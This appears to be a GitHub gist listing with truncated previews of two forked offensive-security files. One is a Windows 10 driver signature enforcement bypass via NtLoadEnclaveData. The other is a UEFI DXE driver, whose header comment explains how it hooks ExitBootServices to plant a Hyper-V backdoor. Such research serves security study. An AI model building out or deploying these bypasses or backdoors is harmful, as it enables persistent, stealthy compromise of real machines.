maldiohead
/ main.c
Created
July 20, 2017 08:05
— forked from hfiref0x/main.c
NtLoadEnclaveData Windows 10 RS3 DSE bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "global.h" | |
| HINSTANCE g_hInstance; | |
| HANDLE g_ConOut = NULL; | |
| BOOL g_ConsoleOutput = FALSE; | |
| WCHAR g_BE = 0xFEFF; | |
| RTL_OSVERSIONINFOW g_osv; | |
| #define CI_DLL "ci.dll" |
maldiohead
/ DmaHvBackdoor.c
Created
August 19, 2017 06:23
— forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ********************************************************************* | |
| Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
| backdoor into the Device Guard enabled Windows 10 Enterprise. | |
| Execution starts from new_ExitBootServices() -- a hook handler | |
| for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
| winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
| transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |